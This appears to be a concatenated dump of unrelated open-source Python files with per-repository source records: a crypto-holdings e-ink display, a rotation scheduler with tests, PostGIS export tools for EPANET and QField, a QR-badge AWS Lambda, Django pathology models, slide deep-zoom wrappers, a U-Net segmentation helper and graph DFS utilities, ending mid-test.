im.putpalette(((0, 0, 0, 255, 0, 0, 255, 255, 255) + (0, 0, 0)*252))
draw = ImageDraw.Draw(im)
draw.rectangle((0, 0, inkyphat.WIDTH, inkyphat.HEIGHT),
fill='white', outline='white')
x_offset = 0
if logo is not None:
logo = self.cga_quantize(logo)
w, h = logo.size
ypos = (inkyphat.HEIGHT - h)//2
im.paste(logo, (0, ypos))
x_offset = 71
max_fontsize = (inkyphat.HEIGHT-len(lines)) // len(lines)
y_offset = (inkyphat.HEIGHT - (max_fontsize * len(lines))) // 2
for text in lines:
fontsize = max_fontsize
fits = False
while not fits and fontsize > 5:
font = ImageFont.truetype(inkyphat.fonts.FredokaOne, fontsize)
w, h = font.getsize(text)
if w < inkyphat.WIDTH - x_offset:
fits = True
else:
fontsize -= 1
draw.text((x_offset, y_offset), text, (255, 0, 0), font=font)
y_offset += fontsize + 1
return im
def get_24hour_value(self, current_value, balances):
since = time.time() - 60*60*24
old_value = 0
crypto_currencies = self.cryptotracker.get_currencies()
for curr in balances.keys():
ch = crypto_currencies[curr]
if balances[curr] <= 0:
continue
oh = self.cryptotracker.k.get_ohlc_data('X{}Z{}'.format(curr, ch.fiat_currency()), interval=5, since=since, ascending=True)
old_value += balances[curr] * oh[0]['close'][-1]
change = current_value - old_value
return (100/old_value)*change
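# e.g. old_value 200.0 and current_value 210.0 give change 10.0 and
# (100 / 200.0) * 10.0 == 5.0, i.e. a +5 % move over the last 24 hours.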
def standing_images(self):
balances, values = self.cryptotracker.update_currencies()
rates = self.cryptotracker.get_exchange_rates()
crypto_currencies = self.cryptotracker.get_currencies()
local_currency = self.cryptotracker.get_local_currency()
local_total = round(sum(values.values()), 2) * \
rates[self.cryptotracker.get_local_currency()]
yield self.get_position_image(values)
yield self.create_image(None, lines=['Total Holdings', locale.currency(local_total, grouping=True, symbol=True, international=True), '24 Hour change', '{} %'.format(round(self.get_24hour_value(sum(values.values()), balances), 2))])
for curr in balances.keys():
total = round(values[curr]*rates[local_currency], 2)
yield self.create_image(crypto_currencies[curr].logo(), (curr, str(balances[curr]), locale.currency(total, symbol=True, grouping=True, international=True)))
def show_slideshow(self, delay=30):
for image in self.standing_images():
inkyphat.set_image(image)
inkyphat.show()
time.sleep(delay)
def main():
config = Config('config.json')
tracker = CryptoTracker(config)
display = DisplayHandler(config, tracker)
while True:
display.show_slideshow()
if __name__ == '__main__':
main()
``` |
{
"source": "jinified/kronos",
"score": 3
} |
#### File: kronos/kronos/kronos.py
```python
from operator import itemgetter
from datetime import datetime, timedelta
def getRotationCapacity(rotationId, startDate, endDate, assignments):
""" Calculate number of users assigned to a particular rotation during the specified duration
"""
start = datetime.strptime(startDate, "%d%m%Y")
end = datetime.strptime(endDate, "%d%m%Y")
duration = int((end - start).days / 7.0)
# Weeks involved during the rotation
weeks = [(start + timedelta(weeks=x)).strftime("%W%Y") for x in range(0, duration)]
capacity = sum(itemgetter(*weeks)(assignments[rotationId][0][0]))
return capacity
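# Worked example (values are illustrative): a rotation from "01012018" to "01042018"
# produces one "%W%Y" key per week of the rotation ("012018", "022018", ...), and the
# capacity is the sum of assignments[rotationId][0][0][week] over those keys.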
def score_assignment(
assignments,
solution,
earliestAvailableDate,
core_rotations=["PMO", "PE", "SE", "PM"],
rotation_duration={
"PMO": 12,
"PE": 12,
"SE": 12,
"PM": 12,
"SYS": 12,
"ARC": 12,
"ANA": 12,
},
):
""" Calculate loss function for suggested solution (negative = better)
Parameters:
assignments (dict): global assignment object by rotation
solution (dict): rotation assignment for a user
earliestAvailableDate (date): earliest date where a user can be assigned a rotation
core_rotations (list): rotation that should be completed first
rotation_duration (dict): duration of each rotation
"""
print(solution)
# SOFT CONSTRAINT 1 - Core rotations should be completed in the first 4 rotations if possible
core_first_loss = sum(
[
-3 if x[0] in core_rotations else 0
for x in solution
if int(x[1]) <= len(core_rotations)
]
)
# SOFT CONSTRAINT 2 - External Assignment must be assigned last
external_assignment_loss = (
99 if "EXT" in [x[0] for x in solution] and solution[-1][0] != "EXT" else 0
)
# Calculate timing of each rotation from solution
solution = [
(
x[0],
rotation_duration[x[0]]
+ (sum([rotation_duration[x[0]] for x in solution[:i]]) if i != 0 else 0),
)
for i, x in enumerate(solution)
]
startDate = earliestAvailableDate
schedule = []
for x in solution:
endDate = startDate + timedelta(weeks=x[1]) - timedelta(days=1)
# Make sure the date falls on weekday
if endDate.weekday() >= 5:
endDate -= timedelta(endDate.weekday() - 4)
schedule.append(
(x[0], startDate.strftime("%d%m%Y"), endDate.strftime("%d%m%Y"))
)
startDate += timedelta(weeks=x[1])
spread_first_loss = sum(
[getRotationCapacity(x[0], x[1], x[2], assignments) for x in schedule]
)
loss = core_first_loss + external_assignment_loss + spread_first_loss
return loss
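# Illustrative reading of the loss (numbers are made up): core_first_loss -12
# (all four core rotations scheduled in the first four slots), external_assignment_loss 0
# and spread_first_loss 30 give loss = 18; a lower (more negative) total is better.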
def schedule2assignments(schedule):
""" Convert schedule object to assignment object
"""
rotations = {}
for userId, userSchedule in schedule.items():
for rotation in userSchedule:
id = rotation["rotationId"]
if id not in rotations:
rotations[id] = [[{}], []]
print(rotations[id][0][0])
startDate, endDate = itemgetter("startDate", "endDate")(rotation)
start = datetime.strptime(startDate, "%d%m%Y")
end = datetime.strptime(endDate, "%d%m%Y")
duration = int((end - start).days / 7.0)
for i in range(duration):
date = (start + timedelta(weeks=i)).strftime("%W%Y")
if date not in rotations[id][0][0]:
rotations[id][0][0][date] = 0
rotations[id][0][0][date] += 1
rotations[id][1].append((userId, startDate, endDate))
sortedDate = sorted(list(rotations[id][0][0].keys()))
if len(rotations[id][0]) < 2:
rotations[id][0].append(sortedDate[0])
rotations[id][0].append(sortedDate[-1])
elif sortedDate[0] < rotations[id][0][1]:
rotations[id][0][1] = sortedDate[0]
elif len(rotations[id][0]) > 2 and sortedDate[-1] > rotations[id][0][2]:
rotations[id][0][2] = sortedDate[-1]
print(rotations)
return rotations
def assignments2schedule(assignments):
""" Convert assignment object to overall schedule
"""
users = {}
for rotationId, rotationInfo in assignments.items():
for userId, userAssignment in rotationInfo[1].items():
if userId not in users:
users[userId] = []
users[userId].append(
{
"rotationId": rotationId,
"startDate": userAssignment[0],
"endDate": userAssignment[1],
}
)
print(users)
return users
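# Hedged shape sketch of the two representations converted above (values illustrative):
#   schedule:    {"user1": [{"rotationId": "PMO", "startDate": "01012018", "endDate": "01042018"}]}
#   assignments: {"PMO": (per-week occupancy counts keyed "%W%Y",
#                         per-user (startDate, endDate) assignment entries)}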
def generateUserSchedule(user, assignments, scoring_function):
""" Generate most optimal user schedule
Parameters:
user (object): User
assignments (dict): Time-bounded assignments
scoring_function (function): scoring function to rank possible assignments
Returns:
schedule (list): list of rotations
"""
return [{"rotationId": "PMO", "startDate": "012018"}]
def getOverallSchedule(users):
""" Generate overall schedule from individual user's schedule
Parameters:
users (list): list of Users
Returns:
schedule (dict): overall assignments
"""
return {}
def getConflictingAssignments(schedule):
""" Get list of assignments which exceeded rotation capacity
Parameters:
schedule (dict): overall assignments
Returns:
confictingAssignmentsByRotation (dict): overall schedule with conflicting assignments
"""
return {}
if __name__ == "__main__":
pass
```
#### File: kronos/tests/test_User.py
```python
import pytest
from kronos.User import User
from kronos.kronos import score_assignment
from datetime import datetime, timedelta
@pytest.fixture(scope='function')
def assignments(request):
""" Generate global assignment object
Parameters:
duration (tuple): pair of date string that denote duration that will be covered by the assignments
Returns:
assignment (obj): assignment object
"""
start, end, rotations = request.param
start = datetime.strptime('1' + start, "%w%W%Y")
end = datetime.strptime('1' + end, "%w%W%Y")
duration = int((end - start).days / 7.0)
# Number of assignments per unit time
occupancy = ({(start + timedelta(weeks=x)).strftime('%W%Y'): 0 for x in range(0, duration + 1)}, start.strftime('%W%Y'), end.strftime('%W%Y'))
return {rotationId: (occupancy, assignments) for rotationId, assignments in rotations.items()}
def test_strRepShouldMatchUserObject():
userSchedule = []
possibleRotations = ['PE', 'SE', 'PM', 'ARC', 'ANA', 'SYS'],
joinDate = "01012018"
displayJoinDate = "01 January 2018"
assert str(User("Jason", userSchedule, possibleRotations, joinDate)) == f"Name: Jason Join: {displayJoinDate}\nSchedule: {userSchedule}\nPossible Rotations: {possibleRotations}"
@pytest.mark.parametrize('assignments', [
('012018', '522023', {
'PMO': {
'sjtsoonj': ('01012018', '01042018'),
'thava': ('01032018', '01062018')
},
'PE': {
'soomay': ('01012018', '01042018'),
'brina': ('01032018', '01062018')
},
'PM': {
'chris': ('01012018', '01042018'),
'akmal': ('05072018', '05092018')
},
'SYS': {
'chris': ('01012019', '01042019'),
'akmal': ('05092018', '05112018')
},
'ARC': {
'jiawei': ('01012019', '01042019'),
'tauteng': ('05092018', '05112018')
},
'ANA': {
'jin': ('01012019', '01042019'),
'thava': ('05092018', '05112018')
},
'SE': {
}})
], indirect=['assignments'])
def test_generateSchedule(assignments):
userSchedule = []
possibleRotations = ['PE', 'SE', 'PM', 'ARC', 'ANA', 'SYS']
joinDate = "01012018"
user = User("Jason", userSchedule, possibleRotations, joinDate)
assert len(user.generateSchedule(assignments, score_assignment)) == len(possibleRotations)
``` |
{
"source": "JinIgarashi/postgis2epanet",
"score": 3
} |
#### File: postgis2epanet/epanet/coordinates.py
```python
import shapefile
from epanet.layer_base import LayerBase
class Coordinates(LayerBase):
class Coordinate(object):
def __init__(self, id, lon, lat, altitude, lon_utm, lat_utm):
self.id = id
self.lon = round(lon, 6)
self.lat = round(lat, 6)
self.altitude = altitude or 0
self.lon_utm = round(lon_utm, 3)
self.lat_utm = round(lat_utm, 3)
self.demand = 0.0
self.pattern = ""
@staticmethod
def create_header_junction(f):
f.writelines("[JUNCTIONS]\n")
f.writelines(";{0}\t{1}\t{2}\t{3}\n"
.format("ID\t".expandtabs(20),
"Elev\t".expandtabs(12),
"Demand\t".expandtabs(12),
"Pattern\t".expandtabs(16)))
def add_junction(self, f):
f.writelines(" {0}\t{1}\t{2}\t{3}\t;\n"
.format("{0}\t".format(self.id).expandtabs(20),
"{0}\t".format(self.altitude).expandtabs(12),
"{0}\t".format(self.demand).expandtabs(12),
"{0}\t".format(self.pattern).expandtabs(16)))
@staticmethod
def create_header_coordinates(f):
f.writelines("[COORDINATES]\n")
f.writelines(";{0}\t{1}\t{2}\n"
.format("Node\t".expandtabs(20),
"X-Coord\t".expandtabs(16),
"Y-Coord\t".expandtabs(16)))
def add_coordinate(self, f):
f.writelines(" {0}\t{1}\t{2}\n"
.format("{0}\t".format(self.id).expandtabs(20),
"{0}\t".format(self.lon_utm).expandtabs(16),
"{0}\t".format(self.lat_utm).expandtabs(16)))
def __init__(self, wss_id):
super().__init__("junctions", wss_id)
self.coordMap = {}
def get_coord_by_id(self, id):
for key in self.coordMap:
coord = self.coordMap[key]
if id == coord.id:
return coord
def get_data(self, db):
query = " WITH points2d AS "
query += " (SELECT (ST_DumpPoints(geom)).geom AS geom FROM pipeline where wss_id={0}), ".format(self.wss_id)
query += " cells AS "
query += " (SELECT p.geom AS geom, ST_Value(a.rast, 1, p.geom) AS alt, "
query += " ST_X(geom) as lon, ST_Y(geom) as lat "
query += " FROM rwanda_dem_10m a RIGHT JOIN points2d p "
query += " ON ST_Intersects(a.rast, p.geom)), "
query += " points3d AS "
query += " (SELECT "
query += " ST_SetSRID(COALESCE(" \
"ST_MakePoint(lon, lat, alt), " \
"ST_MakePoint(lon, lat)), {0}) AS geom ".format(str(self.epsg))
query += " , lon, lat, alt "
query += " FROM cells) "
query += " SELECT row_number() over() as id,st_x(geom) as lon, st_y(geom) as lat, st_z(geom)as alt, "
query += " st_x(st_transform(geom,{0})) as lon_utm, st_y(st_transform(geom,{0})) as lat_utm ".format(str(self.epsg_utm))
query += " FROM points3d WHERE geom is not NULL"
result = db.execute(query)
for data in result:
coord = Coordinates.Coordinate("Node-" + str(data[0]), data[1], data[2], data[3], data[4], data[5])
key = ",".join([str(coord.lon), str(coord.lat)])
self.coordMap[key] = coord
def add_coordinate(self, coord):
target_key = ",".join([str(coord.lon), str(coord.lat)])
del_key = []
for key in self.coordMap:
if key == target_key:
del_key.append(target_key)
for key in del_key:
self.coordMap.pop(key)
self.coordMap[target_key] = coord
def export_junctions(self, f):
Coordinates.Coordinate.create_header_junction(f)
for key in self.coordMap:
coord = self.coordMap[key]
if "Node" in coord.id:
coord.add_junction(f)
f.writelines("\n")
def export_coordinates(self, f):
Coordinates.Coordinate.create_header_coordinates(f)
for key in self.coordMap:
coord = self.coordMap[key]
coord.add_coordinate(f)
f.writelines("\n")
def export_shapefile(self, f, del_coords_id):
filename = self.get_file_path(f)
with shapefile.Writer(filename) as _shp:
_shp.autoBalance = 1
_shp.field('dc_id', 'C', 254)
_shp.field('elevation', 'N', 20)
_shp.field('pattern', 'C', 254)
_shp.field('demand', 'N', 20, 9)
_shp.field('demand_pto', 'N', 20, 9)
for key in self.coordMap:
coord = self.coordMap[key]
if "Node" in coord.id:
if coord.id in del_coords_id:
continue
_shp.point(float(coord.lon), float(coord.lat))
_shp.record(coord.id, coord.altitude, coord.pattern, coord.demand, '')
_shp.close()
self.createProjection(filename)
def add_demands(self, connections):
for conn in connections:
target_key = ",".join([str(conn.lon), str(conn.lat)])
for key in self.coordMap:
if key == target_key:
self.coordMap[key].demand = conn.demands
``` |
{
"source": "JinIgarashi/postgis2inventoryreport",
"score": 3
} |
#### File: lib/layer/pipeline.py
```python
from lib.layer.layerbase import LayerBase
class Pipeline(LayerBase):
def __init__(self, conn):
super().__init__(conn, 'pipeline')
def plot(self, ax):
if self.df.empty:
return
self.df.plot(ax=ax, figsize=(20, 10), color='blue', linewidth=1, label="Pipeline")
```
#### File: lib/layer/waterconnection.py
```python
from lib.layer.layerbase import LayerBase
class WaterConnection(LayerBase):
def __init__(self, conn):
super().__init__(conn, 'water_connection')
def plot(self, ax):
cmap = self.generate_cmap(['green', 'yellow', 'red'])
typelist = [{'name' : 'Household', 'marker': 'p', 'column': 'status', 'markersize': 45},
{'name' : 'Public Tap', 'marker': '$\\bigoplus$', 'column': 'status', 'markersize': 30},
{'name' : 'Water Kiosk', 'marker': '$\\bigodot$', 'column': 'status', 'markersize': 30},
{'name': 'Industrial', 'marker': '$\\bigotimes$', 'column': 'status', 'markersize': 30}]
self.plot_by_filter(ax, 'connection_type', typelist, cmap)
```
#### File: postgis2inventoryreport/lib/mapcreator.py
```python
import os
from lib.map.districtmap import DistrictMap
from lib.map.wssmap import WssMap
class MapCreator(object):
def __init__(self, db, district, main_directory):
self.db = db
self.district = district
self.main_directory = main_directory
def create(self):
if not os.path.exists(self.main_directory):
os.makedirs(self.main_directory, exist_ok=True)
dist_dir = "/".join([self.main_directory, "images", str(self.district.dist_id)])
dist_map = DistrictMap(self.db, dist_dir, self.district.dist_id, self.district.wss_id_list)
dist_map.create()
for wss_id in self.district.wss_id_list.split(','):
wss = WssMap(self.db, dist_dir, wss_id)
wss.create()
``` |
{
"source": "JinIgarashi/postgis2qfield",
"score": 2
} |
#### File: postgis2qfield/layers/junction.py
```python
from layers.layer_base import LayerBase
class Junction(LayerBase):
def __init__(self):
super().__init__("junction")
self.parse_dates = ['input_date']
``` |
{
"source": "jinimong/serverless-study",
"score": 2
} |
#### File: serverless/make/lambda_function.py
```python
import os
import json
import boto3
import qrcode
from PIL import Image, ImageDraw, ImageFont
def lambda_handler(event, context):
# Fetch the required files from S3
s3 = boto3.resource("s3")
s3.Object(os.environ["BUCKET_NAME"], "imgs/cat.jpg").download_file(
"/tmp/logo.jpg"
)
s3.Object(
os.environ["BUCKET_NAME"], "fonts/summer-calling.ttf"
).download_file("/tmp/font.ttf")
records = event["Records"]
if records:
user_id = records[0]["Sns"]["Message"]
conf_type = records[0]["Sns"]["Subject"]
# Load the record from DynamoDB
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table(os.environ["TABLE_NAME"])
row = table.get_item(Key={"user_id": user_id, "type": conf_type})
item = row["Item"]
save_path = "/tmp/image.jpg"
key = f"qrcodes/{user_id}/{conf_type}/qrcode.jpg"
# Generate the image, then upload it to S3
make_image(data=item, save_path=save_path)
s3.meta.client.upload_file(
save_path,
os.environ["BUCKET_NAME"],
key,
ExtraArgs={"ContentType": "image/jpeg"},
)
return {"statusCode": 200, "event": event}
def make_image(data, save_path):
W, H = (400, 400)
# logo img
logo = Image.open("/tmp/logo.jpg").convert("RGBA")
ttf = "/tmp/font.ttf"
# qrcode img
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=4,
border=4,
)
qr.add_data(data.get("phone_number", ""))
qr.make(fit=True)
qr_img = qr.make_image(fill_color="black", back_color="white")
# merge
img = Image.new("RGB", (W, H), color="#fff")
img.paste(logo, (0, 0), logo)
img.paste(qr_img, (270, 50))
# draw
font_m = ImageFont.truetype(ttf, 15)
font_b = ImageFont.truetype(ttf, 18)
font_B = ImageFont.truetype(ttf, 19)
draw = ImageDraw.Draw(img)
draw.text((50, 240), data.get("user_name", ""), fill="#000", font=font_b)
company_name = data.get("company_name", "")
draw.text((50, 280), f"From {company_name}", fill="#000", font=font_m)
draw.text((20, 200), "FULL CONFERENCE PASS", fill="#ed244b", font=font_B)
img.save(save_path, quality=100)
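# Hedged local test sketch (comments only): bypasses SNS/S3/DynamoDB and assumes
# /tmp/logo.jpg and /tmp/font.ttf already exist on disk; the field values are made up.
#
#   make_image({"phone_number": "010-0000-0000", "user_name": "Jane",
#               "company_name": "Acme"}, "/tmp/qrcode_test.jpg")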
``` |
{
"source": "jinimp/QAS",
"score": 2
} |
#### File: QAS/Image/models.py
```python
from django.db import models
class Image(models.Model):
"""大图信息"""
id = models.AutoField(primary_key=True, verbose_name=u'唯一主键')
file_name = models.CharField(max_length=128, verbose_name=u'文件名', null=True, blank=True)
suffix = models.CharField(max_length=16, verbose_name=u'文件后缀名', null=True, blank=True)
storage_path = models.CharField(max_length=256, verbose_name=u'存储路径', null=True, blank=True)
last_open_time = models.DateTimeField(verbose_name=u'上次打开时间', null=True, blank=True)
file_size = models.CharField(max_length=16, verbose_name=u'文件大小', null=True, blank=True)
is_delete = models.BooleanField(verbose_name=u'是否逻辑删除', default=False)
create_time = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
update_time = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
class Meta:
db_table = 'tb_image' # custom database table name
verbose_name = '大图信息' # display name of the table in the Django admin
verbose_name_plural = verbose_name
def __str__(self):
return '当前文件名为:%s' % self.file_name
```
#### File: QAS/Patient/models.py
```python
from django.db import models
class Patient(models.Model):
"""
Patient information
"""
GENDER_CHOICES = (
(1, "男"),
(0, "女"),
)
id = models.AutoField(primary_key=True, verbose_name=u'唯一主键')
# personal information
name = models.CharField(max_length=32, verbose_name=u"姓名", null=True, blank=True)
age = models.IntegerField(verbose_name=u"年龄", null=True, blank=True)
gender = models.CharField(max_length=8, default=0, choices=GENDER_CHOICES, verbose_name=u"性别")
num_no = models.CharField(max_length=32, verbose_name=u"编号", null=True, blank=True)
# pathology information
specimen_source = models.CharField(max_length=32, verbose_name=u'标本来源', blank=True, null=True)
report_time = models.DateTimeField(verbose_name=u'报告时间', blank=True, null=True)
send_time = models.DateTimeField(verbose_name=u"送检时间", blank=True, null=True)
is_delete = models.BooleanField(verbose_name=u'是否逻辑删除', default=False)
create_time = models.DateTimeField(verbose_name=u"创建时间", auto_now_add=True)
update_time = models.DateTimeField(verbose_name=u"更新时间", auto_now=True)
def __str__(self):
return '用户名为:%s' % self.name
class Meta:
db_table = 'tb_patient' # custom database table name
verbose_name = u'患者信息'
verbose_name_plural = verbose_name
```
#### File: QAS/Patient/serializers.py
```python
from rest_framework import serializers
from .models import Patient
class SCPatientSerializer(serializers.ModelSerializer):
"""查增"""
report_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')
send_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')
class Meta:
model = Patient
fields = ('id', 'name', 'age', 'gender', 'specimen_source',
'num_no', 'report_time', 'send_time')
def validate_age(self, value):
"""验证年龄"""
if value:
if int(value) > 100 or int(value) < 10:
raise serializers.ValidationError('参数错误')
return value
class UPatientSerializer(serializers.ModelSerializer):
"""修改"""
report_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)
send_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S', read_only=True)
class Meta:
model = Patient
fields = ('id', 'name', 'age', 'gender', 'specimen_source',
'num_no', 'report_time', 'send_time')
def validate_age(self, value):
"""验证年龄"""
if value:
if int(value) > 100 or int(value) < 10:
raise serializers.ValidationError('参数错误')
return value
```
#### File: Services/Aslide/deepzoom.py
```python
from openslide.deepzoom import DeepZoomGenerator as OpenSlideDZG
from Services.Aslide.kfb.kfb_deepzoom import DeepZoomGenerator as KfbDZG
from Services.Aslide.tmap.tmap_deepzoom import DeepZoomGenerator as TmapDZG
class ADeepZoomGenerator(object):
def __init__(self, osr, tile_size=254, overlap=1, limit_bounds=False):
if osr.format in ['.kfb', '.KFB']:
self._dzg = KfbDZG(osr, tile_size, overlap, limit_bounds)
elif osr.format in ['.tmap', '.TMAP']:
self._dzg = TmapDZG(osr, 256, overlap, limit_bounds)
else:
self._dzg = OpenSlideDZG(osr, tile_size, overlap, limit_bounds)
@property
def level_count(self):
"""The number of Deep Zoom levels in the image."""
return self._dzg.level_count
@property
def level_tiles(self):
"""A list of (tiles_x, tiles_y) tuples for each Deep Zoom level."""
return self._dzg.level_tiles
@property
def level_dimensions(self):
"""A list of (pixels_x, pixels_y) tuples for each Deep Zoom level."""
return self._dzg.level_dimensions
@property
def tile_count(self):
"""The total number of Deep Zoom tiles in the image."""
return self._dzg.tile_count
def get_dzi(self, format):
"""
:param format: the format of the individual tiles ('png' or 'jpeg')
:return: a string containing the XML metadata for the .dzi file.
"""
return self._dzg.get_dzi(format)
def get_tile(self, level, address):
"""
:param level: the Deep Zoom level
:param address: the address of the tile within the level as a (col, row) tuple.
:return: Return an RGB PIL.Image for a tile
"""
return self._dzg.get_tile(level, address)
if __name__ == '__main__':
filepath = "/home/stimage/Development/DATA/TEST_DATA/test001.kfb"
from aslide import Aslide
slide = Aslide(filepath)
dzg = ADeepZoomGenerator(slide)
print("level_count : ", dzg.level_count)
print("level_tiles : ", dzg.level_tiles)
print("level_dimensions : ", dzg.level_dimensions)
print("tile count : ", dzg.tile_count)
print("dzi : \n")
print(dzg.get_dzi('jpeg'))
tile = dzg.get_tile(13, (0, 0))
import matplotlib.pyplot as plt
plt.imshow(tile)
plt.show()
```
#### File: Aslide/tmap/tmap_deepzoom.py
```python
from io import BytesIO
from Services.Aslide.tmap import tmap_lowlevel, tmap_slide
from xml.etree.ElementTree import ElementTree, Element, SubElement
class DeepZoomGenerator(object):
def __init__(self, slide, tile_size=254, overlap=1, limit_bounds=False):
self.slide = slide
self._osr = slide._osr
self._z_t_downsample = tile_size
self._z_overlap = overlap
self._limit_bounds = limit_bounds
def get_tile(self, level, address):
"""Return an RGB PIL.Image for a tile.
level: the Deep Zoom level.
address: the address of the tile within the level as a (col, row)
tuple."""
level = self.slide.level_downsamples[level]
return tmap_lowlevel.get_tile_data(self._osr._osr, level, address[1], address[0])
def get_dzi(self, format):
"""Return a string containing the XML metadata for the .dzi file.
format: the format of the individual tiles ('png' or 'jpeg')"""
image = Element('Image', TileSize=str(self._z_t_downsample),
Overlap=str(self._z_overlap), Format=format,
xmlns='http://schemas.microsoft.com/deepzoom/2008')
w, h = self.slide.dimensions
SubElement(image, 'Size', Width=str(w), Height=str(h))
tree = ElementTree(element=image)
buf = BytesIO()
tree.write(buf, encoding='UTF-8')
return buf.getvalue().decode('UTF-8')
def main():
slide = tmap_slide.TmapSlide(
'/media/wqf/4adb4c9e-80d5-43fd-8bf8-c4d8f353091f/tsimage/tiffs_un/SZH1513139_N_4_20181220132441.TMAP')
dzg = DeepZoomGenerator(slide)
img = dzg.get_tile(0, (110, 100))  # level 0 is illustrative; the original called the undefined get_tile_data()
img.show()
slide.close()
if __name__ == '__main__':
main()
```
#### File: Services/Unet/find_test_data.py
```python
import os
class FindNeed(object):
def __init__(self):
self.path = '/media/kyfq/f2b5b050-085b-4a49-b06d-f9e7e99e0abd/kyfq/cells_three/FUNGI'
# self.path = '/media/kyfq/f2b5b050-085b-4a49-b06d-f9e7e99e0abd/kyfq/cells_three/ACTINO'
self.res_list = {}
def run(self):
for pathology in os.listdir(self.path):
self.res_list.setdefault(pathology, {})
for cls in os.listdir(os.path.join(self.path, pathology)):
img_list = os.listdir(os.path.join(self.path, pathology, cls))
self.res_list[pathology].setdefault(cls, len(img_list))
def statistic(self):
for k, v in self.res_list.items():
if 'HSIL_S' in v and 'LSIL_E' in v and 'ASCUS' in v and 'SC' in v:
print('pathology: %s' % k,
'ASCUS: %s' % v.get('ASCUS'),
'LSIL_E: %s' % v.get('LSIL_E'),
'HSIL_S: %s' % v.get('HSIL_S'),
'SC: %s' % v.get('SC')
)
if __name__ == '__main__':
find_need = FindNeed()
find_need.run()
find_need.statistic()
```
#### File: Services/Unet/unetImp.py
```python
import os
import cv2
import numpy as np
import mxnet as mx
from collections import namedtuple
'''
prefix : prefix of model name
epoch : number of iterations of the model. model name = prefix + '-' + epoch + '.params'
seg_data_shape : initialize the network with input shape
batch_size : batch size
ctx : select gpu (mx.gpu(0))
return : the Unet model
'''
def get_segmentation_mod(prefix = './segnet_bb5_final', epoch = 0, seg_data_shape = 128, batch_size = 1, ctx = mx.gpu(0)):
sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
mod = mx.mod.Module(symbol=sym, context=ctx, data_names=['data'], label_names=None)
mod.bind(for_training=False, data_shapes=[('data', (batch_size, 3, seg_data_shape, seg_data_shape))], label_shapes=None)
mod.set_params(arg_params=arg_params, aux_params=aux_params)
return mod
'''
img : input original image
mod : Unet model
return : predicted results
'''
def seg_img(img, mod):
Batch = namedtuple('Batch', ['data'])
cls_mean_val = np.array([[[107]], [[107]], [[107]]])
cls_std_scale = 1.0
img = np.transpose(img, (2, 0, 1))
img = img[np.newaxis, :]
img = cls_std_scale * (img.astype(np.float32) - cls_mean_val)
mod.forward(Batch([mx.nd.array(img)]))
pred = mod.get_outputs()[0].asnumpy()
pred = np.argmax(pred, axis=1)[0]
return pred
'''
pred : predicted results from seg_img()
'''
def find_max_contour(pred):
img3, contours, hierarchy = cv2.findContours(pred, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
mask_contour = np.zeros_like(pred)
try:
cv2.drawContours(mask_contour, contours, 0, color=255, thickness=-1)
return mask_contour, contours
except:
return pred, contours
'''
img : original image
a : coefficient a, img * a + b
b : coefficient b, img * a + b
return : contrast enhanced image
'''
def contrast_brightness_image(img, a = 1.8, b = -90):
h, w, ch = img.shape
src2 = np.zeros([h, w, ch], img.dtype)
dst = cv2.addWeighted(img, a, src2, 1-a, b)
return dst
if __name__ == "__main__":
testdir = r'./data/test'
savedir = r'./test/'
imgfiles = [i for i in os.listdir(testdir) if i.endswith('.jpg')]
seg_mod = get_segmentation_mod()
print("done")
for i, fn in enumerate(imgfiles):
fn_path = testdir+'/'+fn
raw_img = cv2.imread(fn_path)
raw_img2 = contrast_brightness_image(raw_img)
# cv2.imwrite('./' + fn, raw_img)
pred = seg_img(raw_img2, seg_mod).astype(np.uint8)
pred, contours = find_max_contour(pred)
cv2.imwrite(savedir + fn.split('.')[0] + '.png', pred)
print('save image')
cv2.drawContours(raw_img, contours, 0, color=(0,255,0), thickness=1)
cv2.imwrite('/home/kyfq/Desktop/raw_img.png', raw_img)
cv2.imshow('origin', raw_img)
cv2.waitKey(0) # waitKey reads keyboard input; the argument is how long to wait in ms, and 0 means wait indefinitely
# ratio of ASCUS / LSIL_E / HSIL_S to SC
``` |
{
"source": "JiniousChoi/encyclopedia-in-code",
"score": 4
} |
#### File: jpylib/jgraphs/_dfs.py
```python
def make_graph(edges, is_undirected=True):
''' @param edges: type of [(u::int, v::int)]
@param is_undirected
@return adjacency list '''
G = {}
for u,v in edges:
G.setdefault(u, [])
if is_undirected:
G.setdefault(v, [])
G[u].append(v)
if is_undirected:
G[v].append(u)
return G
def dfs_iterative(n, G, start):
''' @param n: total number of nodes
@param G: edges of adjacent list
@param start: where to start searching
@return None '''
stack = [[start, -1]] # [(node_no, edge_pointer)]
visited = [False for _ in range(n)]
while stack:
here, i = stack[-1]
if i==-1:
yield here
visited[here] = True
i += 1
for j in range(i, len(G[here])):
there = G[here][j]
if visited[there]:
continue
#assert not visited[there]
stack[-1][-1] = j+1
stack.append([there,-1])
break
else:
stack.pop(-1)
def count_components(n, G):
return len(topological_sort_all(n, G))
def topological_sort(n, G, start):
''' @return [node_no::int] '''
visited, topology_stack = [False for _ in range(n)], []
_dfs(n, G, start, visited, topology_stack)
return topology_stack[::-1]
def topological_sort_all(n, G):
''' @return [[node_no::int]] '''
visited = [False for _ in range(n)]
def dfs_all():
topology_stacks = []
for u in range(n):
if not visited[u]:
topology_stack = []
_dfs(n, G, u, visited, topology_stack)
topology_stacks.append(topology_stack[::-1])
return topology_stacks
return dfs_all()
def _dfs(n, G, here, visited, topology_stack):
visited[here] = True
for there in G.get(here, []):
if visited[there]: continue
_dfs(n, G, there, visited, topology_stack)
topology_stack.append(here) #post-order
import unittest
import random
class DFSTest(unittest.TestCase):
def setUp(self):
self.n1, self.edges1 = 5, [(0, 1), (1, 3), (3, 2), (3, 4), (4, 2)]
random.shuffle(self.edges1)
self.n2, self.edges2 = 6, [(1, 2), (2, 4), (4, 3), (4, 5), (5, 3)]
random.shuffle(self.edges2)
def test_dfs_iterative_basics(self):
G = make_graph([(0,1),(0,2),(0,3),(2,3)])
